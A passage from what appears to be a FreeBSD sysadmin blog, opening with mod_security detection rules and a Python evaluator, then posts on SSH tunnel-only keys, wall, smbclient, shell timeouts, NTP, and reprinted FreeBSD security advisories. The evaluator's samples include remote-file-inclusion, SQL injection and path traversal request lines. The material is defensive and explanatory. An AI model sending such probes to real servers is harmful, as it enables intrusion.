# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"

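Before dropping a list like this into a production config it is worth seeing how the rule semantics play out on real request lines: a chain fires only when every filter in it matches, a leading "!" inverts a filter (which is how the exclusion lists above whitelist known-good scripts), and the broad signatures do catch benign traffic. The following is an added example and is not from the original post or from the gotroot rule set: a small evaluator with four of the rules above transcribed into Python's re syntax ([[:space:]] becomes \s, and matching is case-insensitive as in mod_security 1.x), run over constructed sample request lines.

```python
"""Added example (not part of the original post): a minimal evaluator for the
mod_security 1.x semantics used by the rules above.  Four rules from the list
are transcribed; the request lines below are constructed samples, shown
already URL-decoded the way mod_security presents them to the filters."""
import re
from dataclasses import dataclass


@dataclass
class Filter:
    location: str   # request field the pattern is tested against
    pattern: str    # regex; a leading '!' means "fires when it does NOT match"
    msg: str = ""   # rule message, carried on the first filter of a chain

    def matches(self, req):
        value = req.get(self.location, "")
        negate = self.pattern.startswith("!")
        regex = self.pattern[1:] if negate else self.pattern
        # mod_security 1.x filters are case-insensitive, so re.IGNORECASE here
        hit = re.search(regex, value, re.IGNORECASE) is not None
        return hit != negate


# Each rule is a chain: every Filter in the list must match for it to fire.
RULES = [
    # Generic PHP code injection protection: exclusion list chained to the
    # signature (".php?...=http://... followed by another ? or &")
    [Filter("REQUEST_URI", r"!(/tiki-objectpermissions|wp-login|tiki-view_cache|/goto)",
            "Generic PHP code injection protection"),
     Filter("REQUEST_URI", r"\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)")],
    # Generic SQL sigs (id 300014)
    [Filter("ARGS", r"(or.+1\s*=\s*1|(or 1=1|'.+)--')",
            "Generic SQL injection protection")],
    # Enforce proper HTTP requests (id 340000)
    [Filter("SERVER_PROTOCOL", r"!^HTTP/(0\.9|1\.0|1\.1)$", "Bad HTTP Protocol")],
    # generic recursion signatures (id 300004)
    [Filter("REQUEST_URI", r"!(alt_mod_frameset\.php)", "Generic Path Recursion denied"),
     Filter("THE_REQUEST", r"\.\./\.\./")],
]


def parse_request_line(line):
    """Split 'METHOD URI PROTOCOL' into the fields the rules look at."""
    method, rest = line.split(" ", 1)
    uri, proto = rest.rsplit(" ", 1)          # URI may contain decoded spaces
    args = uri.split("?", 1)[1] if "?" in uri else ""
    return {"THE_REQUEST": line, "REQUEST_URI": uri, "ARGS": args,
            "SERVER_PROTOCOL": proto, "REQUEST_METHOD": method}


def evaluate(req):
    """Return the msg of every rule whose whole chain matches; [] means allowed."""
    return [chain[0].msg for chain in RULES if all(f.matches(req) for f in chain)]


# Constructed samples: an RFI probe, the same shape on a whitelisted script,
# a benign redirect the broad signature also blocks (false positive), a SQL
# probe, a traversal attempt and a bogus protocol version.
SAMPLES = [
    "GET /index.php?page=http://attacker.example/x.txt? HTTP/1.1",
    "GET /wp-login.php?redirect_to=http://example.com/? HTTP/1.1",
    "GET /redirect.php?to=https://example.com/?ref=home HTTP/1.1",
    "GET /item.php?id=1' or 1=1--' HTTP/1.1",
    "GET /images/../../etc/passwd HTTP/1.0",
    "GET / HTTP/9.9",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", evaluate(parse_request_line(line)) or "allowed")
```

The third sample is the kind of legitimate redirect parameter that makes the author warn the rules "might cause problems with some sites/scripts"; the fix in this rule set is to extend the "!(...)" exclusion list on the first filter of the chain.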
How to restrict a user only to portforwarding in SSH Tunnel

Wednesday, May 30th, 2007

This sounds strange, doesn't it? Let me tell you why you would need it. I have a user who accesses my MySQL database through Windows ODBC. The usual communication between client and server runs unencrypted, so I decided to tunnel it through an SSH tunnel.

Create the file ~user/.ssh/authorized_keys like this:

#  -> command="..."
#     this command simply prints something to prevent a timeout while
#     the ssh session is running. Quoting characters like double quotes
#     inside this command must be escaped with a backslash
#  -> permitopen="127.0.0.1:3306"
#     restrict the person using this key to port forwarding
#     3306 on localhost only
#  -> from=...
#     only allow connections from this host (not needed but sometimes useful)
# the rest is the public key; options and key must all be on ONE line
command="/usr/bin/perl -e '$|=1;while (1) { print scalar localtime() . \"\n\";sleep 30}'",permitopen="127.0.0.1:3306",from="box1.freebsd.org.in" ssh-dss AAAAB3NzaC1kc3MAAACBAJ4vXg== some@comment_for_key

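As an added example (not part of the original post), here is a small Python parser for the option section of such an authorized_keys line, plus a check that a key meant only for the MySQL tunnel really carries the restrictions described above. The parser follows the sshd(8) rules for quoted values (commas are allowed inside them, and a backslash before a double quote escapes it, which is why the perl command above works). The no-pty, no-X11-forwarding and no-agent-forwarding flags it also looks for are standard sshd options the post does not mention; the sample line is constructed, with a placeholder key blob.

```python
"""Added example, not from the original post: parse the options of an
authorized_keys line and audit a tunnel-only key.  The sample line is a
constructed copy of the post's entry with a placeholder key blob."""

KEY_TYPES = ("ssh-dss", "ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256")


def parse_authorized_key(line):
    """Return (options, keytype, keyblob, comment) for one authorized_keys line.
    options maps each option name to a list of values (True for flag options
    such as no-pty); a list because options like permitopen may be repeated."""
    options = {}
    i = 0
    if not line.startswith(KEY_TYPES):          # there is an option section
        name = ""
        while i < len(line):
            c = line[i]
            if c == '"':
                # quoted value: runs to the next unescaped double quote
                i += 1
                buf = []
                while i < len(line) and line[i] != '"':
                    if line[i] == "\\" and i + 1 < len(line) and line[i + 1] == '"':
                        i += 1                  # \" -> " (other backslashes kept)
                    buf.append(line[i])
                    i += 1
                i += 1                          # skip the closing quote
                options.setdefault(name, []).append("".join(buf))
                name = ""
            elif c == "=":
                i += 1
            elif c == ",":
                if name:                        # flag option without a value
                    options.setdefault(name, []).append(True)
                name = ""
                i += 1
            elif c == " ":                      # end of the option section
                if name:
                    options.setdefault(name, []).append(True)
                i += 1
                break
            else:
                name += c
                i += 1
    fields = line[i:].split(None, 2)
    keytype, blob = fields[0], fields[1]
    comment = fields[2] if len(fields) > 2 else ""
    return options, keytype, blob, comment


HARDENING_FLAGS = ("no-pty", "no-X11-forwarding", "no-agent-forwarding")


def tunnel_only_issues(options, allowed_forward="127.0.0.1:3306"):
    """Return the reasons this key is NOT limited to the MySQL forward.
    Checks the post's command= and permitopen=, plus three sshd flags
    (added hardening) that close the remaining interactive channels."""
    issues = []
    if "command" not in options:
        issues.append("no forced command: the key gives an interactive shell")
    if "permitopen" not in options:
        issues.append("no permitopen: any local port forward is allowed")
    else:
        for target in options["permitopen"]:
            if target != allowed_forward:
                issues.append("permitopen %s is not %s" % (target, allowed_forward))
    for flag in HARDENING_FLAGS:
        if flag not in options:
            issues.append("%s not set" % flag)
    return issues


# Constructed sample: the post's entry written on one line as sshd expects.
SAMPLE_LINE = (
    'command="/usr/bin/perl -e \'$|=1;while (1) { print scalar localtime() . \\"\\n\\";sleep 30}\'",'
    'permitopen="127.0.0.1:3306",from="box1.freebsd.org.in" '
    'ssh-dss AAAAB3NzaC1kc3MAAACBAJ4vXg== some@comment_for_key'
)

if __name__ == "__main__":
    opts, keytype, _, comment = parse_authorized_key(SAMPLE_LINE)
    print(keytype, comment, opts)
    for issue in tunnel_only_issues(opts):
        print("issue:", issue)
```

Run against a whole authorized_keys file, line by line, this reports every key that could be used for more than the single forward it was handed out for.
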
Sending a Message to All Users on a FreeBSD System

Wednesday, May 30th, 2007

You can use the wall command to send a message to every user on a system. The general syntax of wall is as follows:
wall
Message
Message
...

When the message is complete, press Control-D.

1) To display the message "Disk failure system will be down for 30 minute" to all users, use wall as follows:
# wall
Disk failure system will be down for 30 minute
--UNIX Admin
--MyCorp.com

When the message is complete, press Control-D (CTRL+D) to send the message to all users.

2) To display the message "Web server under DOS attack, come to IDC # 3" to all members of the wheel group, use wall with the -g option as follows:
# wall -g wheel
Web server under DOS attack, come to IDC # 3 to investigate matter further.
-- IT HEAD

When the message is complete, press Control-D (CTRL+D) to send the message to all users in the group.

Sending a Message to Windows Workstation

Wednesday, May 30th, 2007

You can use the smbclient utility (part of the Samba suite) to send a message to a Windows system from FreeBSD. This command lets you send messages to Windows workstations, display browse lists, and connect to SMB shares. The general syntax for sending a message is as follows:

smbclient -M hostname
Message
Message
..

When the message is complete, press Control-D.

1) To send the message "Meeting cancelled" to a Windows system called xp1 (here the message is fed through a here-document, so EOF ends it instead of Control-D):

$ smbclient -M xp1 <<EOF
Conference cancelled
See you at home in 2 hrs.
--Funtoosh
EOF

2) With -U you can specify the username.
$ smbclient -M xp1 -U Funtoosh <<EOF
Conference cancelled
See you at home in 2 hrs.
EOF

Read the smbclient man page for more information.

Increase local FreeBSD security by Locking Admin screen or console

Wednesday, May 30th, 2007

This is especially useful on systems where multiple users have access to the console: one user may lock his or her session while still allowing other users to use the system on other virtual consoles. If desired, the entire console may be locked and virtual console switching disabled. Locking is a really good idea for a workstation that is used to control other servers in your network. KDE and Gnome generally include a locking feature. The idea is very simple: secure your terminal from unwanted people.

Shell variables to auto-logout
Almost all modern shells support some sort of auto-logout option. Under bash you use the TMOUT variable: set TMOUT to a number of seconds, and bash terminates if no input arrives within that time. For example, to set a TMOUT of 60 seconds:

$ export TMOUT=60

So if no input (a typed command) arrives in time, the shell terminates with the following message:
timed out waiting for input: auto-logout

You can add TMOUT to your shell configuration file, ~/.bash_profile.

However, I prefer the autologout variable of tcsh (the default shell under FreeBSD). The general syntax is as follows:
$ set autologout = (VAL1 VAL2)

Where:
VAL1 : the number of minutes of inactivity before automatic logout
VAL2 : the number of minutes of inactivity before automatic locking takes place (optional)
For example, you can set autologout as follows:

$ set autologout = (5 10)

You can add autologout to your shell configuration file, ~/.cshrc or ~/.tcshrc.
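A TMOUT value that a user can simply `unset` from an idle shell gives little protection; marking it readonly closes that gap. The script below is an added example (not part of the original post) that writes an enforced TMOUT stanza into a profile file and checks that a given profile both sets TMOUT and marks it readonly; the profile path and the 600-second value are illustrative.

```shell
#!/bin/sh
# Added example: enforce an idle timeout for bash users so that it cannot be
# undone with "unset TMOUT" from an unattended shell.
# Assumptions: bash login shells read the profile file we write (for example
# /etc/profile on FreeBSD); the 600-second value is illustrative.

# Append an enforced TMOUT stanza to the given profile file.
install_tmout() {
    profile="$1"
    seconds="$2"
    cat >> "$profile" <<EOF
# Idle shell timeout: bash exits after $seconds seconds without input.
TMOUT=$seconds
readonly TMOUT
export TMOUT
EOF
}

# Return 0 if the file both sets TMOUT to a positive value and marks it
# readonly; return 1 if TMOUT is unset/zero, 2 if it is set but not readonly.
check_tmout_enforced() {
    profile="$1"
    value=$(sed -n 's/^TMOUT=\([0-9][0-9]*\).*/\1/p' "$profile" | tail -n 1)
    [ -n "$value" ] && [ "$value" -gt 0 ] || return 1
    grep -q '^readonly[[:space:]]\{1,\}TMOUT' "$profile" || return 2
    return 0
}

# Demonstration on a constructed temporary profile.
demo_profile=$(mktemp)
printf 'TMOUT=60\n' > "$demo_profile"        # set, but a user could unset it
if check_tmout_enforced "$demo_profile"; then
    echo "enforced"
else
    echo "not enforced: TMOUT present but not readonly"
fi
install_tmout "$demo_profile" 600
if check_tmout_enforced "$demo_profile"; then
    echo "enforced: TMOUT=600 and readonly"
fi
rm -f "$demo_profile"
```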

Using lock command under FreeBSD
The lock command requests a password from the user, reads it again for verification, and then will normally not relinquish the terminal until the password is repeated.

$ lock

Key:
Again:
lock: /dev/ttyp0 on fbsd6.freebsd.org.in. timeout in 15 minutes.
time now is Tue May 30 20:46:14 IST 2007
Key:

FreeBSD Time/Clock Synchronization with NTP server

Wednesday, May 30th, 2007

FreeBSD uses the Network Time Protocol (NTP) for synchronising the clocks of computer systems over packet-switched, variable-latency data networks. NTP uses UDP port 123. If you have one computer or a single server then you can easily synchronise its time with other NTP servers. All you need is the NTP client called ntpdate. It is used to set the date and time via NTP servers.

Step # 1: Install NTP

# pkg_add -rv ntp

OR

# cd /usr/ports/net/ntp
# make && make install

Step # 2: Pick appropriate NTP Servers
Visit the public NTP time server list to pick your NTP server.

Step # 3: Open UDP port 123 at firewall

If you are running the FreeBSD ipfilter firewall then you need to open UDP port 123. Just add the following rule to your firewall script:

pass out quick on lnc0 proto udp from YOUR-SERVER to any port = 123 keep state

OR

pass out quick on lnc0 proto udp from YOUR-SERVER to TIME-SERVER-IP port = 123 keep state

For example, if my FreeBSD workstation IP is 192.168.1.16 and 61.246.176.131 is the IP of the NTP server, then my rule in the ipf.conf file is as follows:

pass out quick on lnc0 proto udp from 192.168.1.16 to 61.246.176.131 port = 123 keep state

Step # 4: Test clock Synchronization
Just run the ntpdate command as follows to verify that you can set the date and clock via NTP:
a) Set wrong date (Mon Dec 13 4:27 pm)

# date 0412131627

b) Now set correct date with ntp:

# ntpdate -v -b in.pool.ntp.org

13 Dec 16:27:50 ntpdate[997]: ntpdate 4.2.0-a Thu Nov 3 07:34:22 UTC 2005 (1)
25 Jan 12:35:47 ntpdate[997]: step time server 61.246.176.131 offset 35237275.965726 sec

c) You can verify that the correct date is now set:

# date
Wed Jan 25 12:36:21 IST 2006

Step # 5 : Enable date and time/clock Synchronization at boot time
You need to enable ntpdate via the /etc/rc.conf file (the ntpdate_* variables are rc.conf settings; they have no effect in /etc/rc.local).

# vi /etc/rc.conf

Append the following lines to it:
ntpdate_enable="YES"
ntpdate_hosts="asia.pool.ntp.org"

Save the file. Make sure you have the correct ntpdate_hosts server entry.
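The ntpdate output in step 4 reports the offset it applied; a host whose clock is far off breaks log correlation, Kerberos ticket lifetimes and certificate validity checks, so the offset is worth alerting on. The script below is an added example (not from the original post): it extracts the offset from ntpdate's output lines and flags values beyond a threshold. The 300-second threshold and the sample lines are constructed for this demonstration; on a real host, feed it the output of `ntpdate -q <server>`.

```shell
#!/bin/sh
# Added example: parse the offset that ntpdate reports and flag a clock that
# is far enough off to need attention.  Assumptions: the 300-second threshold
# and the sample lines below are constructed; the first sample mirrors the
# ~35 million second step shown in the post after the date was set to 2004.

# Print the absolute offset in seconds from an ntpdate "step"/"adjust" line.
# Prints nothing and returns 1 if the line carries no offset field.
ntp_offset_seconds() {
    line="$1"
    offset=$(printf '%s\n' "$line" |
        sed -n 's/.*offset \(-\{0,1\}[0-9][0-9]*\(\.[0-9]*\)\{0,1\}\) sec.*/\1/p')
    [ -n "$offset" ] || return 1
    # Drop a leading minus sign: only the magnitude matters for alerting.
    printf '%s\n' "${offset#-}"
}

# Return 0 if the offset is within the threshold, 1 if it needs attention.
# The comparison is done in awk because sh arithmetic is integer only.
clock_within() {
    threshold="$1"
    offset="$2"
    awk -v o="$offset" -v t="$threshold" 'BEGIN { exit (o <= t) ? 0 : 1 }'
}

# Constructed sample lines in ntpdate's output format.
sample_step='25 Jan 12:35:47 ntpdate[997]: step time server 61.246.176.131 offset 35237275.965726 sec'
sample_adjust='25 Jan 12:40:01 ntpdate[1012]: adjust time server 61.246.176.131 offset -0.031227 sec'

for line in "$sample_step" "$sample_adjust"; do
    off=$(ntp_offset_seconds "$line") || { echo "no offset in: $line"; continue; }
    if clock_within 300 "$off"; then
        echo "OK: offset ${off}s within threshold"
    else
        echo "ALERT: offset ${off}s exceeds threshold; check ntpdate_hosts and the UDP/123 firewall rule"
    fi
done
```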

FreeBSD: Heap overflow in file

Wednesday, May 30th, 2007
FreeBSD-SA-07:04.file                                       Security Advisory
The FreeBSD Project

Topic:          Heap overflow in file(1)

Category:       contrib
Module:         file
Announced:      2007-05-23
Affects:        All FreeBSD releases.
Corrected:      2007-05-23 16:12:51 UTC (RELENG_6, 6.2-STABLE)
2007-05-23 16:13:07 UTC (RELENG_6_2, 6.2-RELEASE-p5)
2007-05-23 16:13:20 UTC (RELENG_6_1, 6.1-RELEASE-p17)
2007-05-23 16:12:10 UTC (RELENG_5, 5.5-STABLE)
2007-05-23 16:12:35 UTC (RELENG_5_5, 5.5-RELEASE-p13)
CVE Name:       CVE-2007-1536

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

The file(1) utility attempts to classify file system objects based on
filesystem, magic number and language tests.

The libmagic(3) library provides most of the functionality of file(1)
and may be used by other applications.

II.  Problem Description

When writing data into a buffer in the file_printf function, the length
of the unused portion of the buffer is not correctly tracked, resulting
in a buffer overflow when processing certain files.

III. Impact

An attacker who can cause file(1) to be run on a maliciously constructed
input can cause file(1) to crash.  It may be possible for such an attacker
to execute arbitrary code with the privileges of the user running file(1).

The above also applies to any other applications using the libmagic(3)
library.

IV.  Workaround

No workaround is available, but systems where file(1) and other
libmagic(3)-using applications are never run on untrusted input are not
vulnerable.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 5.5]
# fetch http://security.FreeBSD.org/patches/SA-07:04/file5.patch
# fetch http://security.FreeBSD.org/patches/SA-07:04/file5.patch.asc

[FreeBSD 6.1 and 6.2]
# fetch http://security.FreeBSD.org/patches/SA-07:04/file6.patch
# fetch http://security.FreeBSD.org/patches/SA-07:04/file6.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libmagic
# make obj && make depend && make && make install

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- -------------------------------------------------------------------------
RELENG_5
src/contrib/file/file.h                                     1.1.1.7.2.1
src/contrib/file/funcs.c                                    1.1.1.1.2.1
src/contrib/file/magic.c                                    1.1.1.1.2.1
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.13
src/sys/conf/newvers.sh                                  1.62.2.21.2.15
src/contrib/file/file.h                                     1.1.1.7.8.1
src/contrib/file/funcs.c                                    1.1.1.1.8.1
src/contrib/file/magic.c                                    1.1.1.1.8.1
RELENG_6
src/contrib/file/file.h                                     1.1.1.8.2.1
src/contrib/file/funcs.c                                    1.1.1.2.2.1
src/contrib/file/magic.c                                    1.1.1.2.2.1
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.8
src/sys/conf/newvers.sh                                   1.69.2.13.2.8
src/contrib/file/file.h                                     1.1.1.8.8.1
src/contrib/file/funcs.c                                    1.1.1.2.8.1
src/contrib/file/magic.c                                    1.1.1.2.8.1
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.19
src/sys/conf/newvers.sh                                  1.69.2.11.2.19
src/contrib/file/file.h                                     1.1.1.8.6.1
src/contrib/file/funcs.c                                    1.1.1.2.6.1
src/contrib/file/magic.c                                    1.1.1.2.6.1
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1536

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-07:04.file.asc
Source: FreeBSD.org

FreeBSD-SA-07:03.ipv6

Wednesday, May 30th, 2007
FreeBSD-SA-07:03.ipv6                                       Security Advisory
The FreeBSD Project

Topic:          IPv6 Routing Header 0 is dangerous

Category:       core
Module:         ipv6
Announced:      2007-04-26
Credits:        Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino
Affects:        All FreeBSD releases.
Corrected:      2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE)
2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4)
2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16)
2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE)
2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12)
CVE Name:       CVE-2007-2242

I.   Background

IPv6 provides a routing header option which allows a packet sender to
indicate how the packet should be routed, overriding the routing knowledge
present in a network.  This functionality is roughly equivalent to the
"source routing" option in IPv4.  All nodes in an IPv6 network -- both
routers and hosts -- are required by RFC 2460 to process such headers.

II.  Problem Description

There is no mechanism for preventing IPv6 routing headers from being used
to route packets over the same link(s) many times.

III. Impact

An attacker can "amplify" a denial of service attack against a link between
two vulnerable hosts; that is, by sending a small volume of traffic the
attacker can consume a much larger amount of bandwidth between the two
vulnerable hosts.

An attacker can use vulnerable hosts to "concentrate" a denial of service
attack against a victim host or network; that is, a set of packets sent
over a period of 30 seconds or more could be constructed such that they
all arrive at the victim within a period of 1 second or less.

Other attacks may also be possible.

IV.  Workaround

No workaround is available.

V.   Solution

NOTE WELL: The solution described below causes IPv6 type 0 routing headers
to be ignored.  Support for IPv6 type 0 routing headers can be re-enabled
if required by setting the newly added net.inet6.ip6.rthdr0_allowed sysctl
to a non-zero value.

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch
# fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
 and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- -------------------------------------------------------------------------
RELENG_5
src/sys/netinet6/in6.h                                         1.35.2.5
src/sys/netinet6/in6_proto.c                                   1.29.2.5
src/sys/netinet6/route6.c                                      1.10.4.2
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.12
src/sys/conf/newvers.sh                                  1.62.2.21.2.14
src/sys/netinet6/in6.h                                     1.35.2.3.2.1
src/sys/netinet6/in6_proto.c                               1.29.2.4.2.1
src/sys/netinet6/route6.c                                  1.10.4.1.4.1
RELENG_6
src/sys/netinet6/in6.h                                         1.36.2.8
src/sys/netinet6/in6_proto.c                                   1.32.2.6
src/sys/netinet6/route6.c                                      1.11.2.2
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.7
src/sys/conf/newvers.sh                                   1.69.2.13.2.7
src/sys/netinet6/in6.h                                     1.36.2.7.2.1
src/sys/netinet6/in6_proto.c                               1.32.2.5.2.1
src/sys/netinet6/route6.c                                  1.11.2.1.4.1
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.18
src/sys/conf/newvers.sh                                  1.69.2.11.2.18
src/sys/netinet6/in6.h                                     1.36.2.6.2.1
src/sys/netinet6/in6_proto.c                               1.32.2.4.2.1
src/sys/netinet6/route6.c                                  1.11.2.1.2.1
- -------------------------------------------------------------------------

VII. References

http://www.secdev.org/conf/IPv6_RH_security-csw07.pdf

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-07:03.ipv6.asc
Source: FreeBSD.org

FreeBSD-SA-07:02.bind

Wednesday, May 30th, 2007
FreeBSD-SA-07:02.bind                                       Security Advisory
The FreeBSD Project

Topic:          Multiple Denial of Service vulnerabilities in named(8)

Category:       contrib
Module:         bind
Announced:      2007-02-09
Affects:        FreeBSD 5.3 and later.
Corrected:      2007-02-07 00:42:09 UTC (RELENG_6, 6.2-STABLE)
2007-02-09 20:24:15 UTC (RELENG_6_2, 6.2-RELEASE-p1)
2007-02-09 20:23:29 UTC (RELENG_6_1, 6.1-RELEASE-p13)
2007-02-07 00:46:35 UTC (RELENG_5, 5.5-STABLE)
2007-02-09 20:22:44 UTC (RELENG_5_5, 5.5-RELEASE-p11)
CVE Name:       CVE-2007-0493, CVE-2007-0494

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

I.   Background

BIND 9 is an implementation of the Domain Name System (DNS) protocols.
The named(8) daemon is an Internet domain name server.  DNS Security
Extensions (DNSSEC) are additional protocol options that add
authentication and integrity to the DNS protocols.

II.  Problem Description

A type * (ANY) query response containing multiple RRsets can trigger an
assertion failure.

Certain recursive queries can cause the nameserver to crash by using memory
which has already been freed.

III. Impact

A remote attacker sending a type * (ANY) query to an authoritative DNS
server for a DNSSEC signed zone can cause the named(8) daemon to exit,
resulting in a Denial of Service.

A remote attacker sending recursive queries can cause the nameserver to
crash, resulting in a Denial of Service.

IV.  Workaround

There is no workaround available, but systems which are not authoritative
servers for DNSSEC signed zones are not affected by the first issue; and
systems which do not permit untrusted users to perform recursive DNS
resolution are not affected by the second issue.  Note that the default
configuration for named(8) in FreeBSD allows local access only (which on
many systems is equivalent to refusing access to untrusted users).

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the
RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the
correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
and 6.2 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 5.5, FreeBSD 6.1]
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind61.patch
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind61.patch.asc

[FreeBSD 6.2]
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind62.patch
# fetch http://security.FreeBSD.org/patches/SA-07:02/bind62.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install

c) Restart the named application:

# /etc/rc.d/named restart

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
Path
- -------------------------------------------------------------------------
RELENG_5
src/contrib/bind9/lib/dns/resolver.c                        1.1.1.1.2.8
src/contrib/bind9/lib/dns/validator.c                       1.1.1.1.2.5
src/contrib/bind9/lib/dns/include/dns/validator.h           1.1.1.1.2.4
RELENG_5_5
src/UPDATING                                            1.342.2.35.2.11
src/sys/conf/newvers.sh                                  1.62.2.21.2.13
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.1.2.4.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.1.2.3.2.1
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.2.2.2.1
RELENG_6
src/contrib/bind9/lib/dns/resolver.c                        1.1.1.2.2.6
src/contrib/bind9/lib/dns/validator.c                       1.1.1.2.2.3
src/contrib/bind9/lib/dns/include/dns/validator.h           1.1.1.1.4.3
RELENG_6_2
src/UPDATING                                             1.416.2.29.2.4
src/sys/conf/newvers.sh                                   1.69.2.13.2.4
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.2.2.4.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.2.2.1.4.2
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.4.1.4.2
RELENG_6_1
src/UPDATING                                            1.416.2.22.2.15
src/sys/conf/newvers.sh                                  1.69.2.11.2.15
src/contrib/bind9/lib/dns/resolver.c                    1.1.1.2.2.2.2.2
src/contrib/bind9/lib/dns/validator.c                   1.1.1.2.2.1.2.1
src/contrib/bind9/lib/dns/include/dns/validator.h       1.1.1.1.4.1.2.1
- -------------------------------------------------------------------------

VII. References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494

The latest revision of this advisory is available at http://security.FreeBSD.org/advisories/FreeBSD-SA-07:02.bind.asc
Source: FreeBSD.org